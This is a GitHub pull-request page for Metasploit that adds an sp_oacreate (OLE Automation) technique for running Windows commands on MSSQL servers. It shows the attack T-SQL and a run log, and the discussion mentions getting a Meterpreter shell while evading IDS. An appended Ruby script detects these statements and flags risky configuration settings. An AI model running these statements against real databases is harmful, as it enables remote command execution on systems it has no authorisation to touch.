
add mssql_exec_oacreate module #14622

Merged
merged 5 commits into from
Apr 12, 2021

Conversation


@FLX-0x00 FLX-0x00 commented Jan 17, 2021

Added the mssql_exec_oacreate module, which will execute a Windows command on an MSSQL/MSDE instance via the sp_oacreate procedure (OLE) instead of xp_cmdshell.

Used in:

def mssql_rebuild_xpcmdshell(opts={})

Reference: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use admin/mssql/mssql_exec_oacreate
  • set correct rhost, username and password for the mssql instance
  • run



label-actions bot commented Jan 18, 2021

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@gwillcox-r7
Contributor

@blacklist-arcc Any update on writing documentation for this module? We may have to attic this pull request if no documentation file is included with it.

@FLX-0x00
Contributor Author

Oh sorry, it completely slipped my focus. I will cover the documentation in the next few business days. Thanks for the kind reminder.

Review comment on modules/auxiliary/admin/mssql/mssql_exec_oacreate.rb (outdated):
mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
print_status('Executing command using sp_oacreate')
mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
Contributor


Will this work if the command CMD contains apostrophe characters ' ? They will probably need to be escaped.

Contributor Author

@FLX-0x00 FLX-0x00 Feb 23, 2021


I think this will not be possible in this case. The xp_cmdshell method that is already implemented in Metasploit has not solved the problem either.

res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)

@adfoster-r7 adfoster-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Feb 23, 2021

label-actions bot commented Feb 23, 2021

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

FLX-0x00 and others added 2 commits February 23, 2021 10:08
Co-authored-by: bcoles <bcoles@gmail.com>
@cdelafuente-r7 cdelafuente-r7 self-assigned this Mar 8, 2021
@cdelafuente-r7 cdelafuente-r7 removed their assignment Mar 16, 2021
@smcintyre-r7
Contributor

Does this make sense to implement as a separate module instead of adding it as a technique to the existing auxiliary/admin/mssql/mssql_exec module? The two are incredibly similar, it just looks like an OptEnum specifying the technique could be used, the datastore options should be identical. Note that since this is an auxiliary module, a custom OptEnum would need to be used instead of a Targets definition.

What could make this even better is if the technique could be automatically determined at runtime, allowing the user to focus on the command they want to run and less on how they want to run it.

@FLX-0x00
Contributor Author

I totally agree, the technique was useful in some pentest situations where xp_cmdshell is not available or monitored by some fancy IDS. I will take a look and try to add another commit extending the "original" module.

@smcintyre-r7 smcintyre-r7 self-assigned this Mar 19, 2021
@FLX-0x00
Contributor Author

@smcintyre-r7 I reverted my changes, followed your advice and modified the original module. Now a technique can be set to use the sp_oacreate function instead. I tested against my own lab and a few hackthebox machines that run MSSQL; both methods work smoothly. As CMD I used the output of the web_delivery module to get a long PowerShell command that provides a Meterpreter shell as a result.

If the xp_cmdshell function fails, sp_oacreate is invoked as a more failsafe method. I added some small hints in the description that no temp data table is created in order to view any output. So the method is again more opsec safe but does not provide any output.

@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 12, 2021
@smcintyre-r7
Contributor

This works for me, I was able to verify that it's running the command correctly.

msf6 auxiliary(admin/mssql/mssql_exec) > set CMD "cmd.exe /c ping 192.168.159.128"
CMD => cmd.exe /c ping 192.168.159.128
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.159.46

[*] 192.168.159.46:52454 - Enable advanced options and ole automation procedures
[*] 192.168.159.46:52454 - SQL Query: EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
[*] 192.168.159.46:52454 - SQL Query: EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
[+] 192.168.159.46:52454 - Executing command using sp_oacreate. No output will be displayed.
[*] 192.168.159.46:52454 - SQL Query: DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, 'cmd.exe /c ping 192.168.159.128';
 Column1
 -------
 0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_exec) >

I made some tweaks to some of the verbiages and updated the docs to describe the techniques. I'll go ahead and land this now, thanks for this contribution!
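The run above shows exactly which statements reach the server when the sp_oacreate technique is used: `sp_configure` enabling "show advanced options" and "Ole Automation Procedures", then `sp_oacreate`/`sp_oamethod`. That makes the path easy to watch for on the defending side. The following is an added example, not code from this pull request or from Metasploit: a small Ruby helper that classifies T-SQL statement text such as a SQL Server audit or Extended Events trace would record (both the OLE Automation route and the xp_cmdshell route), and that checks a `sys.configurations` snapshot for the risky options being enabled. The function names, the severity levels, and all sample inputs are assumptions constructed for the example; the sample statements are modeled on the ones printed in the module output above.

```ruby
# Added example (not part of the pull request or of Metasploit): detection and
# hardening checks for the MSSQL command-execution paths discussed in the thread.

LEVELS = { low: 1, medium: 2, high: 3 }.freeze

# Indicator patterns with a severity each. Enabling the options alone is
# suspicious outside a change window; invoking the procedures is high severity.
PATTERNS = {
  advanced_enable: [/sp_configure\s+'show advanced options'\s*,\s*1\b/i, :low],
  ole_enable:      [/sp_configure\s+'Ole Automation Procedures'\s*,\s*1\b/i, :medium],
  cmdshell_enable: [/sp_configure\s+'xp_cmdshell'\s*,\s*1\b/i, :medium],
  ole_exec:        [/\bsp_oa(?:create|method)\b/i, :high],
  # Requires whitespace after the name so that sp_configure 'xp_cmdshell' does
  # not also count as an invocation.
  cmdshell_exec:   [/\bxp_cmdshell\s+\S/i, :high],
}.freeze

# Return the indicator tags (in PATTERNS order) that one statement matches.
def classify(statement)
  PATTERNS.select { |_tag, (re, _sev)| statement.match?(re) }.keys
end

# Scan a list of statements; one finding per suspicious statement, carrying
# the highest severity among its tags.
def scan(statements)
  statements.each_with_object([]) do |stmt, findings|
    tags = classify(stmt)
    next if tags.empty?

    severity = tags.map { |t| PATTERNS[t][1] }.max_by { |s| LEVELS[s] }
    findings << { statement: stmt, tags: tags, severity: severity }
  end
end

# Hardening check over rows shaped like the result of
#   SELECT name, value_in_use FROM sys.configurations
# Returns the names of risky options whose value_in_use is 1.
RISKY_OPTIONS = ['xp_cmdshell', 'Ole Automation Procedures'].freeze

def risky_enabled(config_rows)
  config_rows
    .select { |r| RISKY_OPTIONS.include?(r[:name]) && r[:value_in_use] == 1 }
    .map { |r| r[:name] }
end

# Constructed sample trace: two benign statements plus the sequence the module
# issues for the sp_oacreate technique and one xp_cmdshell invocation.
SAMPLE_STATEMENTS = [
  "SELECT name FROM sys.databases;",
  "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
  "EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;",
  "DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; " \
  "EXEC sp_oamethod @mssql, 'run', null, 'cmd.exe /c ping 192.168.159.128';",
  "EXEC master..xp_cmdshell 'whoami'",
  "UPDATE orders SET status = 'shipped' WHERE id = 42;",
].freeze

# Constructed sys.configurations snapshot (assumed values).
SAMPLE_CONFIG = [
  { name: 'show advanced options', value_in_use: 1 },
  { name: 'Ole Automation Procedures', value_in_use: 1 },
  { name: 'xp_cmdshell', value_in_use: 0 },
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_STATEMENTS).each do |f|
    puts "[#{f[:severity]}] #{f[:tags].join(',')}: #{f[:statement][0, 70]}"
  end
  puts "Risky options enabled: #{risky_enabled(SAMPLE_CONFIG).join(', ')}"
end
```

Run stand-alone it prints four findings (the sp_configure pair at low/medium, the sp_oacreate chain and the xp_cmdshell call at high) and reports "Ole Automation Procedures" as the only risky option enabled. Flagging the configuration change separately from the invocation matters because, as the thread notes, the OLE route produces no result set on the attacker's side, so the `sp_configure` ... `RECONFIGURE` pair may be the clearest artifact an audit trail has.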

@smcintyre-r7 smcintyre-r7 merged commit 7a07146 into rapid7:master Apr 12, 2021
Contributor

smcintyre-r7 commented Apr 12, 2021

Release Notes

Updated the auxiliary/admin/mssql/mssql_exec module to add the sp_oacreate technique, which is a more stealthy alternative to the traditional xp_cmdshell stored procedure.

@smcintyre-r7 smcintyre-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Apr 12, 2021
@FLX-0x00 FLX-0x00 deleted the mssql_exec_oacreate branch April 13, 2021 06:56
@pbarry-r7 pbarry-r7 added rn-enhancement release notes enhancement and removed rn-modules release notes for new or majorly enhanced modules labels Apr 28, 2021
Labels
docs module rn-enhancement release notes enhancement